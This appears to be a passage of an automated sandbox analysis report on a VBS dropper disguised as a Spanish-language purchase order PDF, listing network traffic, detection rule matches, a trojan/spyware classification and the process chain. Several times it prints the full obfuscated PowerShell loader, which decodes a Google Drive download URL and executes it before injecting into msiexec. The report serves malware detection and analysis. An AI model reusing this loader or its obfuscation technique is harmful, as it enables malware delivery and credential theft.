                Source: powershell.exe, 00000002.00000002.2241557151.00000297D780F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D5F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D77ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D7813000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2423603656.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D780F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D5F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D77ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D7813000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2423603656.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D780F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D5F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D77ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D7813000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2423603656.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D780F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D5F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D77ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D7813000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2423603656.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49715 version: TLS 1.2

                System Summary

                barindex
                Source: amsi32_5588.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 5972, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 5588, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers -lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ & ($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0 Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2 Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst, ';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus 'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne (Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia ,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer uadvMasseiRaviscRrlggeWagglP oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers -lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ & ($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0 Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2 Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst, ';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus 'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne (Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia ,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer uadvMasseiRaviscRrlggeWagglP oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848D9B2762_2_00007FF848D9B276
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848D9C0222_2_00007FF848D9C022
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_02CCF3205_2_02CCF320
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_02CCFBF05_2_02CCFBF0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_3_00BBF2BF7_3_00BBF2BF
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_3_00BC0E937_3_00BC0E93
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_3_00BC468F7_3_00BC468F
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_3_00BC47827_3_00BC4782
                Source: SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbsInitial sample: Strings found which are bigger than 50
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6878
                Source: unknownProcess created: Commandline size = 6878
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6878Jump to behavior
                Source: amsi32_5588.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 5972, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 5588, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@8/10@2/3
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Tavell.VrdJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7108:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ziide4ti.rqg.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5972
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5588
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: msiexec.exe, 00000007.00000003.2459414589.0000000021E55000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbsVirustotal: Detection: 12%
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers -lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ & ($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0 Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2 Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst, ';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus 'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne (Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia ,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer uadvMasseiRaviscRrlggeWagglP oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers -lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ & ($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0 Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2 Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst, ';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus 'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne (Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia ,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer uadvMasseiRaviscRrlggeWagglP oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers -lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ & ($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0 Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2 Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst, ';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus 'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne (Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia ,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer uadvMasseiRaviscRrlggeWagglP oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
